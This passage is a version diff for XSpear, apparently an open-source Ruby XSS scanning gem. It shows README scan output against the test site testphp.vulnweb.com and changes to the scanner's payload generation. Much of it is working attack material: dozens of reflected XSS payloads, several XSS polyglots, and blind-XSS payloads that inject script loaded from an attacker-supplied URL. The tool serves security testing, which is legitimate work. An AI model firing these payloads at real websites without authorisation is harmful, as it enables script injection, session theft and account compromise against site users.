Code"},{"id":11,"type":"HIGH","issue":"XSS","method":"GET","param":"cat","payload":"<video/poster/onerror=alert(45)>","description":"reflected HTML5 XSS Code"},{"id":12,"type":"HIGH","issue":"XSS","method":"GET","param":"cat","payload":"<audio src onloadstart=alert(45)>","description":"reflected HTML5 XSS Code"},{"id":13,"type":"HIGH","issue":"XSS","method":"GET","param":"cat","payload":"\"><iframe/src=JavaScriPt:alert(45)>","description":"reflected XSS Code"},{"id":14,"type":"HIGH","issue":"XSS","method":"GET","param":"cat","payload":"<keygen autofocus onfocus=alert(45)>","description":"reflected onfocus XSS Code"},{"id":15,"type":"HIGH","issue":"XSS","method":"GET","param":"cat","payload":"<meter onmouseover=alert(45)>0</meter>","description":"reflected HTML5 XSS Code"},{"id":16,"type":"HIGH","issue":"XSS","method":"GET","param":"cat","payload":"<select autofocus onfocus=alert(45)>","description":"reflected onfocus XSS Code"},{"id":17,"type":"HIGH","issue":"XSS","method":"GET","param":"cat","payload":"<textarea autofocus onfocus=alert(45)>","description":"reflected onfocus XSS Code"},{"id":18,"type":"HIGH","issue":"XSS","method":"GET","param":"cat","payload":"<input autofocus onfocus=alert(45)>","description":"reflected onfocus XSS Code"},{"id":19,"type":"VULN","issue":"XSS","method":"GET","param":"cat","payload":"<svg(0x0c)onload=alert(1)>","description":"triggered <svg(0x0c)onload=alert(1)>"},{"id":20,"type":"VULN","issue":"XSS","method":"GET","param":"cat","payload":"<script>alert(45)</script>","description":"triggered <script>alert(45)</script>"},{"id":21,"type":"VULN","issue":"XSS","method":"GET","param":"cat","payload":"'\"><svg/onload=alert(45)>","description":"triggered <svg/onload=alert(45)>"},{"id":22,"type":"HIGH","issue":"XSS","method":"GET","param":"cat","payload":"<audio src onloadstart=alert(45)>","description":"triggered <audio src onloadstart=alert(45)>"},{"id":23,"type":"HIGH","issue":"XSS","method":"GET","param":"cat","payload":"<marquee onstart=alert(45)>","description":"triggered <marquee onstart=alert(45)>"},{"id":24,"type":"HIGH","issue":"XSS","method":"GET","param":"cat","payload":"<details/open/ontoggle=\"alert(45)\">","description":"triggered <details/open/ontoggle=\"alert(45)\">"}]}
226
+ $ xspear -u "http://testphp.vulnweb.com/listproducts.php?cat=123&zfdfasdf=124fffff" -v 1 -o json
227
+ {"starttime":"2019-08-14 23:58:12 +0900","endtime":"2019-08-14 23:58:44 +0900","issue_count":24,"issue_list":[{"id":0,"type":"INFO","issue":"STATIC ANALYSIS","method":"GET","param":"-","payload":"<original query>","description":"Found Server: nginx/1.4.1"},{"id":1,"type":"INFO","issue":"STATIC ANALYSIS","method":"GET","param":"-","payload":"<original query>","description":"Not set HSTS"},{"id":2,"type":"INFO","issue":"STATIC ANALYSIS","method":"GET","param":"-","payload":"<original query>","description":"Content-Type: text/html"},{"id":3,"type":"LOW","issue":"STATIC ANALYSIS","method":"GET","param":"-","payload":"<original query>","description":"Not Set X-Frame-Options"},{"id":4,"type":"MIDUM","issue":"STATIC ANALYSIS","method":"GET","param":"-","payload":"<original query>","description":"Not Set CSP"},{"id":5,"type":"INFO","issue":"DYNAMIC ANALYSIS","method":"GET","param":"cat","payload":"XsPeaR\"","description":"Found SQL Error Pattern"},{"id":6,"type":"INFO","issue":"REFLECTED","method":"GET","param":"cat","payload":"rEfe6","description":"reflected parameter"},{"id":7,"type":"INFO","issue":"FILERD RULE","method":"GET","param":"cat","payload":"onhwul=64","description":"not filtered event handler on{any} pattern"},{"id":8,"type":"HIGH","issue":"XSS","method":"GET","param":"cat","payload":"<script>alert(45)</script>","description":"reflected XSS Code"},{"id":9,"type":"HIGH","issue":"XSS","method":"GET","param":"cat","payload":"<textarea autofocus onfocus=alert(45)>","description":"reflected onfocus XSS Code"},{"id":10,"type":"HIGH","issue":"XSS","method":"GET","param":"cat","payload":"<video/poster/onerror=alert(45)>","description":"reflected HTML5 XSS Code"},{"id":11,"type":"HIGH","issue":"XSS","method":"GET","param":"cat","payload":"<audio src onloadstart=alert(45)>","description":"reflected HTML5 XSS Code"},{"id":12,"type":"HIGH","issue":"XSS","method":"GET","param":"cat","payload":"<details/open/ontoggle=\"alert`45`\">","description":"reflected HTML5 XSS Code"},{"id":13,"type":"HIGH","issue":"XSS","method":"GET","param":"cat","payload":"<select autofocus onfocus=alert(45)>","description":"reflected onfocus XSS Code"},{"id":14,"type":"HIGH","issue":"XSS","method":"GET","param":"cat","payload":"<marquee onstart=alert(45)>","description":"reflected HTML5 XSS Code"},{"id":15,"type":"HIGH","issue":"XSS","method":"GET","param":"cat","payload":"<input autofocus onfocus=alert(45)>","description":"reflected onfocus XSS Code"},{"id":16,"type":"HIGH","issue":"XSS","method":"GET","param":"cat","payload":"\"><iframe/src=JavaScriPt:alert(45)>","description":"reflected XSS Code"},{"id":17,"type":"HIGH","issue":"XSS","method":"GET","param":"cat","payload":"<meter onmouseover=alert(45)>0</meter>","description":"reflected HTML5 XSS Code"},{"id":18,"type":"HIGH","issue":"XSS","method":"GET","param":"cat","payload":"<keygen autofocus onfocus=alert(45)>","description":"reflected onfocus XSS Code"},{"id":19,"type":"HIGH","issue":"XSS","method":"GET","param":"cat","payload":"<audio src onloadstart=alert(45)>","description":"triggered <audio src onloadstart=alert(45)>"},{"id":20,"type":"HIGH","issue":"XSS","method":"GET","param":"cat","payload":"<marquee onstart=alert(45)>","description":"triggered <marquee onstart=alert(45)>"},{"id":21,"type":"HIGH","issue":"XSS","method":"GET","param":"cat","payload":"<details/open/ontoggle=\"alert(45)\">","description":"triggered <details/open/ontoggle=\"alert(45)\">"},{"id":22,"type":"VULN","issue":"XSS","method":"GET","param":"cat","payload":"<script>alert(45)</script>","description":"triggered <script>alert(45)</script>"},{"id":23,"type":"VULN","issue":"XSS","method":"GET","param":"cat","payload":"'\"><svg/onload=alert(45)>","description":"triggered <svg/onload=alert(45)>"}]}
211
228
  ```
212
229
 
213
230
  ## Usage on ruby code (gem library)
@@ -278,7 +295,7 @@ Common Callback Class
278
295
  - CallbackCheckHeaders
279
296
  - CallbackStringMatch
280
297
  - CallbackNotAdded
281
- etc...
298
+ - etc...
282
299
 
283
300
  ## Update
284
301
  if nomal user
data/lib/XSpear/version.rb CHANGED
@@ -1,3 +1,3 @@
1
1
  module XSpear
2
- VERSION = "1.1.4"
2
+ VERSION = "1.1.5"
3
3
  end
data/lib/XSpear.rb CHANGED
@@ -28,6 +28,8 @@ class XspearScan
28
28
  @blind_url = options['blind']
29
29
  @report = XspearRepoter.new @url, Time.now, (@data.nil? ? "GET" : "POST")
30
30
  @filtered_objects = {}
31
+ @reflected_params = []
32
+ @param_check_switch = 0
31
33
  end
32
34
 
33
35
  class ScanCallbackFunc
@@ -65,8 +67,10 @@ class XspearScan
65
67
  class CallbackNotAdded < ScanCallbackFunc
66
68
  def run
67
69
  if @response.body.include? @query
68
- time = Time.now
69
- puts '[I]'.blue + " [#{time.strftime('%H:%M:%S')}] [#{@response.code}/#{@response.message}] reflected #{@query}"
70
+ if (@verbose.to_i > 1)
71
+ time = Time.now
72
+ puts '[I]'.blue + " [#{time.strftime('%H:%M:%S')}] [#{@response.code}/#{@response.message}] reflected #{@query}"
73
+ end
70
74
  [false, true]
71
75
  else
72
76
  [false, "Not reflected #{@query}"]
@@ -421,32 +425,69 @@ class XspearScan
421
425
  ]
422
426
 
423
427
 
424
- log('s', 'creating a test query.')
428
+ ## [ Parameter Analysis ]
429
+ log('s', 'analysis request..')
425
430
  r.push makeQueryPattern('x', '<script>alert(45)</script>', '<script>alert(45)</script>', 'i', "Found WAF", CallbackCheckWAF)
426
431
  r.push makeQueryPattern('s', '', '', 'i', "-", CallbackCheckHeaders)
427
432
  r.push makeQueryPattern('d', 'XsPeaR"', 'XsPeaR"', 'i', "Found SQL Error Pattern", CallbackErrorPatternMatch)
428
433
  r.push makeQueryPattern('r', 'rEfe6', 'rEfe6', 'i', 'reflected parameter', CallbackStringMatch)
434
+ r = r.flatten
435
+ r = r.flatten
436
+
437
+
438
+ threads = []
439
+ r.each_slice(@thread) do |jobs|
440
+ jobs.map do |node|
441
+ Thread.new do
442
+ begin
443
+ result, req, res = task(node[:query], node[:inject], node[:pattern], node[:callback])
444
+ # p result.body
445
+ if @verbose.to_i > 2
446
+ log('d', "[#{res.code}/#{res.message}] #{node[:query]} in #{node[:inject]}\n[ Request ]\n#{req.to_hash.inspect}\n[ Response ]\n#{res.to_hash.inspect}")
447
+ end
448
+ if result[0]
449
+ log(node[:category], "[#{res.code}/#{res.message}] "+(result[1]).to_s.yellow+"[param: #{node[:param]}][#{node[:desc]}]")
450
+ @report.add_issue(node[:category],node[:type],node[:param],node[:query],node[:pattern],node[:desc])
451
+ @reflected_params.push node[:param]
452
+ elsif (node[:callback] == CallbackNotAdded) && (result[1].to_s == "true")
453
+ @filtered_objects[node[:param].to_s].nil? ? (@filtered_objects[node[:param].to_s] = [node[:pattern].to_s]) : (@filtered_objects[node[:param].to_s].push(node[:pattern].to_s))
454
+ elsif node[:type] != "d"
455
+ log('d', "[#{res.code}/#{res.message}] '#{node[:param]}' "+(result[1]).to_s)
456
+ end
457
+ rescue => e
458
+ end
459
+ end
460
+ end.each(&:join)
461
+ end
462
+ log('s',"creating a test query [for reflected #{@reflected_params.length} param + blind xss ]")
463
+ @param_check_switch = false
464
+ ## [ XSS Scanning ]
465
+ r = []
429
466
  # Check Special Char
430
467
  special_chars.each do |sc|
431
468
  r.push makeQueryPattern('f', "#{sc}XsPeaR", "#{sc}XsPeaR", 'i', "not filtered "+"#{sc}".blue, CallbackNotAdded)
432
469
  end
433
470
 
471
+
434
472
  # Check Event Handler
435
473
  r.push makeQueryPattern('f', '\"><xspear onhwul=64>', 'onhwul=64', 'i', "not filtered event handler "+"on{any} pattern".blue, CallbackStringMatch)
436
474
  event_handler.each do |ev|
437
475
  r.push makeQueryPattern('f', "\"<xspear #{ev}=64>", "#{ev}=64", 'i', "not filtered event handler "+"#{ev}=64".blue, CallbackNotAdded)
438
476
  end
439
477
 
478
+
440
479
  # Check HTML Tag
441
480
  tags.each do |tag|
442
481
  r.push makeQueryPattern('f', "\">xsp<#{tag}>", "xsp<#{tag}>", 'i', "not filtered "+"<#{tag}>".blue, CallbackNotAdded)
443
482
  end
444
483
 
484
+
445
485
  # Check useful code
446
486
  useful_code.each do |c|
447
487
  r.push makeQueryPattern('f', "#{c}.xspear", "#{c}.xspear", 'i', "not filtered "+"'#{c}' code".blue, CallbackNotAdded)
448
488
  end
449
489
 
490
+
450
491
  # Check Common XSS Payloads
451
492
  onfocus_tags = [
452
493
  "input",
@@ -465,13 +506,15 @@ class XspearScan
465
506
  r.push makeQueryPattern('x', '"\'><marquee onstart=alert(45)>', '<marquee onstart=alert(45)>', 'h', "reflected "+"HTML5 XSS Code".red, CallbackStringMatch)
466
507
  r.push makeQueryPattern('x', '"\'><meter onmouseover=alert(45)>0</meter>', '<meter onmouseover=alert(45)>0</meter>', 'h', "reflected "+"HTML5 XSS Code".red, CallbackStringMatch)
467
508
 
509
+
468
510
  onfocus_tags.each do |t|
469
511
  r.push makeQueryPattern('x', "\"'><#{t} autofocus onfocus=alert(45)>", "<#{t} autofocus onfocus=alert(45)>", 'h', "reflected "+"onfocus XSS Code".red, CallbackStringMatch)
470
512
  end
471
513
 
514
+
472
515
  # Check Selenium Common XSS Payloads
473
516
  r.push makeQueryPattern('x', '"><script>alert(45)</script>', '<script>alert(45)</script>', 'v', "triggered ".yellow+"<script>alert(45)</script>".red, CallbackXSSSelenium)
474
- r.push makeQueryPattern('x', '"><svg onload = alert(45) >', '<svg(0x0c)onload=alert(1)>', 'v', "triggered ".yellow+"<svg(0x0c)onload=alert(1)>".red, CallbackXSSSelenium)
517
+ r.push makeQueryPattern('x', '"><svgonload=alert(45)>', '<svg(0x0c)onload=alert(1)>', 'v', "triggered ".yellow+"<svg(0x0c)onload=alert(1)>".red, CallbackXSSSelenium)
475
518
  r.push makeQueryPattern('x', '<xmp><p title="</xmp><svg/onload=alert(45)>">', '<xmp><p title="</xmp><svg/onload=alert(45)>">', 'v', "triggered ".yellow+"<xmp><p title='</xmp><svg/onload=alert(45)>'>".red, CallbackXSSSelenium)
476
519
  r.push makeQueryPattern('x', '\'"><svg/onload=alert(45)>', '\'"><svg/onload=alert(45)>', 'v', "triggered ".yellow+"<svg/onload=alert(45)>".red, CallbackXSSSelenium)
477
520
  r.push makeQueryPattern('x', '"\'><video/poster/onerror=alert(45)>', '<video/poster/onerror=alert(45)>', 'h', "triggered ".yellow+"<video/poster/onerror=alert(45)>".red, CallbackXSSSelenium)
@@ -479,49 +522,55 @@ class XspearScan
479
522
  r.push makeQueryPattern('x', '"\'><audio src onloadstart=alert(45)>', '<audio src onloadstart=alert(45)>', 'h', "triggered ".yellow+"<audio src onloadstart=alert(45)>".red, CallbackXSSSelenium)
480
523
  r.push makeQueryPattern('x', '"\'><marquee onstart=alert(45)>', '<marquee onstart=alert(45)>', 'h', "triggered ".yellow+"<marquee onstart=alert(45)>".red, CallbackXSSSelenium)
481
524
 
525
+
482
526
  # Check Selenium XSS Polyglot
483
527
  r.push makeQueryPattern('x', 'jaVasCript:/*-/*`/*\`/*\'/*"/**/(/* */oNcliCk=alert(45) )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert(45)//>\x3e', '\'"><svg/onload=alert(45)>', 'v', "triggered ".yellow+"XSS Polyglot payload".red, CallbackXSSSelenium)
484
528
  r.push makeQueryPattern('x', 'javascript:"/*`/*\"/*\' /*</stYle/</titLe/</teXtarEa/</nOscript></Script></noembed></select></template><FRAME/onload=/**/alert(45)//-->&lt;<sVg/onload=alert`45`>', '\'"><svg/onload=alert(45)>', 'v', "triggered ".yellow+"XSS Polyglot payload".red, CallbackXSSSelenium)
485
529
  r.push makeQueryPattern('x', 'javascript:"/*\'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*&lt;svg/*/onload=alert(45)//>', '\'"><svg/onload=alert(45)>', 'v', "triggered ".yellow+"XSS Polyglot payload".red, CallbackXSSSelenium)
486
530
 
487
531
 
532
+
533
+
488
534
  # Check Blind XSS Payload
489
535
  if !@blind_url.nil?
490
- r.push makeQueryPattern('f', "\"'><script src=#{@blind_url}></script>", "NOTDETECTED", 'i', "", CallbackNotAdded)
491
- r.push makeQueryPattern('f', "\"'><script>$.getScript('#{@blind_url}')</script>", "NOTDETECTED", 'i', "", CallbackNotAdded)
492
- r.push makeQueryPattern('f', "\"'><svg onload=javascript:eval('d=document; _ = d.createElement(\'script\');_.src=\'#{@blind_url}\';d.body.appendChild(_)')>", "NOTDETECTED", 'i', "", CallbackNotAdded)
493
- r.push makeQueryPattern('f', "\"'><iframe src=javascript:$.getScript('#{@blind_url}')></iframe>", "NOTDETECTED", 'i', "", CallbackNotAdded)
536
+ r.push makeQueryPattern('f', "\"'><script src=#{@blind_url}></script>", "BLINDNOTDETECTED", 'i', "", CallbackNotAdded)
537
+ r.push makeQueryPattern('f', "\"'><script>$.getScript('#{@blind_url}')</script>", "BLINDNOTDETECTED", 'i', "", CallbackNotAdded)
538
+ r.push makeQueryPattern('f', "\"'><svg onload=javascript:eval('d=document; _ = d.createElement(\'script\');_.src=\'#{@blind_url}\';d.body.appendChild(_)')>", "BLINDNOTDETECTED", 'i', "", CallbackNotAdded)
539
+ r.push makeQueryPattern('f', "\"'><iframe src=javascript:$.getScript('#{@blind_url}')></iframe>", "BLINDNOTDETECTED", 'i', "", CallbackNotAdded)
494
540
  end
495
541
 
542
+
496
543
  r = r.flatten
497
544
  r = r.flatten
498
545
  log('s', "test query generation is complete. [#{r.length} query]")
499
- log('s', "starting test and analysis. [#{@thread} threads]")
546
+ log('s', "starting XSS Scanning. [#{@thread} threads]")
547
+
500
548
 
501
549
  threads = []
502
550
  r.each_slice(@thread) do |jobs|
503
551
  jobs.map do |node|
504
552
  Thread.new do
505
553
  begin
506
- result, req, res = task(node[:query], node[:inject], node[:pattern], node[:callback])
507
- # p result.body
508
- if @verbose.to_i > 2
509
- log('d', "[#{res.code}/#{res.message}] #{node[:query]} in #{node[:inject]}\n[ Request ]\n#{req.to_hash.inspect}\n[ Response ]\n#{res.to_hash.inspect}")
510
- end
511
- if result[0]
512
- log(node[:category], "[#{res.code}/#{res.message}] "+(result[1]).to_s.yellow+"[param: #{node[:param]}][#{node[:desc]}]")
513
- @report.add_issue(node[:category],node[:type],node[:param],node[:query],node[:pattern],node[:desc])
514
- elsif (node[:callback] == CallbackNotAdded) && (result[1].to_s == "true")
515
- @filtered_objects[node[:param].to_s].nil? ? (@filtered_objects[node[:param].to_s] = [node[:pattern].to_s]) : (@filtered_objects[node[:param].to_s].push(node[:pattern].to_s))
516
- else
517
- log('d', "[#{res.code}/#{res.message}] '#{node[:param]}' "+(result[1]).to_s)
518
- end
554
+ result, req, res = task(node[:query], node[:inject], node[:pattern], node[:callback])
555
+ # p result.body
556
+ if @verbose.to_i > 2
557
+ log('d', "[#{res.code}/#{res.message}] #{node[:query]} in #{node[:inject]}\n[ Request ]\n#{req.to_hash.inspect}\n[ Response ]\n#{res.to_hash.inspect}")
558
+ end
559
+ if result[0]
560
+ log(node[:category], "[#{res.code}/#{res.message}] "+(result[1]).to_s.yellow+"[param: #{node[:param]}][#{node[:desc]}]")
561
+ @report.add_issue(node[:category],node[:type],node[:param],node[:query],node[:pattern],node[:desc])
562
+ elsif (node[:callback] == CallbackNotAdded) && (result[1].to_s == "true")
563
+ @filtered_objects[node[:param].to_s].nil? ? (@filtered_objects[node[:param].to_s] = [node[:pattern].to_s]) : (@filtered_objects[node[:param].to_s].push(node[:pattern].to_s))
564
+ elsif node[:type] != "f"
565
+ log('d', "[#{res.code}/#{res.message}] '#{node[:param]}' "+(result[1]).to_s)
566
+ end
519
567
  rescue => e
520
568
  end
521
569
  end
522
570
  end.each(&:join)
523
571
  end
524
572
 
573
+
525
574
  @report.set_filtered @filtered_objects
526
575
  @report.set_endtime
527
576
  log('s', "finish scan. the report is being generated..")
@@ -555,19 +604,7 @@ class XspearScan
555
604
  begin
556
605
  params = URI.decode_www_form(uri.query)
557
606
  params.each do |p|
558
- if @params.nil? || (@params.include? p[0] if !@params.nil?)
559
- attack = ""
560
- dparams = params
561
- dparams.each do |d|
562
- attack = uri.query.sub "#{d[0]}=#{d[1]}","#{d[0]}=#{d[1]}#{URI::encode(payload)}" if p[0] == d[0]
563
- #d[1] = p[1] + payload if p[0] == d[0]
564
- end
565
- result.push("inject": 'url',"param":p[0] ,"type": type, "query": attack, "pattern": pattern, "desc": desc, "category": category, "callback": callback)
566
- end
567
- end
568
- unless @data.nil?
569
- params = URI.decode_www_form(@data)
570
- params.each do |p|
607
+ if (@param_check_switch) || (@reflected_params.include? p[0]) || pattern == "BLINDNOTDETECTED"
571
608
  if @params.nil? || (@params.include? p[0] if !@params.nil?)
572
609
  attack = ""
573
610
  dparams = params
@@ -575,7 +612,23 @@ class XspearScan
575
612
  attack = uri.query.sub "#{d[0]}=#{d[1]}","#{d[0]}=#{d[1]}#{URI::encode(payload)}" if p[0] == d[0]
576
613
  #d[1] = p[1] + payload if p[0] == d[0]
577
614
  end
578
- result.push("inject": 'body', "param":p[0], "type": type, "query": attack, "pattern": pattern, "desc": desc, "category": category, "callback": callback)
615
+ result.push("inject": 'url',"param":p[0] ,"type": type, "query": attack, "pattern": pattern, "desc": desc, "category": category, "callback": callback)
616
+ end
617
+ end
618
+ end
619
+ unless @data.nil?
620
+ params = URI.decode_www_form(@data)
621
+ params.each do |p|
622
+ if !@param_check_switch || (@reflected_params.include? p)
623
+ if @params.nil? || (@params.include? p[0] if !@params.nil?)
624
+ attack = ""
625
+ dparams = params
626
+ dparams.each do |d|
627
+ attack = uri.query.sub "#{d[0]}=#{d[1]}","#{d[0]}=#{d[1]}#{URI::encode(payload)}" if p[0] == d[0]
628
+ #d[1] = p[1] + payload if p[0] == d[0]
629
+ end
630
+ result.push("inject": 'body', "param":p[0], "type": type, "query": attack, "pattern": pattern, "desc": desc, "category": category, "callback": callback)
631
+ end
579
632
  end
580
633
  end
581
634
  end
@@ -586,7 +639,6 @@ class XspearScan
586
639
  end
587
640
  end
588
641
 
589
-
590
642
  def task(query, injected, pattern, callback)
591
643
  begin
592
644
  uri = URI.parse(@url)
metadata CHANGED
@@ -1,14 +1,14 @@
1
1
  --- !ruby/object:Gem::Specification
2
2
  name: XSpear
3
3
  version: !ruby/object:Gem::Version
4
- version: 1.1.4
4
+ version: 1.1.5
5
5
  platform: ruby
6
6
  authors:
7
7
  - hahwul
8
8
  autorequire:
9
9
  bindir: exe
10
10
  cert_chain: []
11
- date: 2019-08-08 00:00:00.000000000 Z
11
+ date: 2019-08-14 00:00:00.000000000 Z
12
12
  dependencies:
13
13
  - !ruby/object:Gem::Dependency
14
14
  name: colorize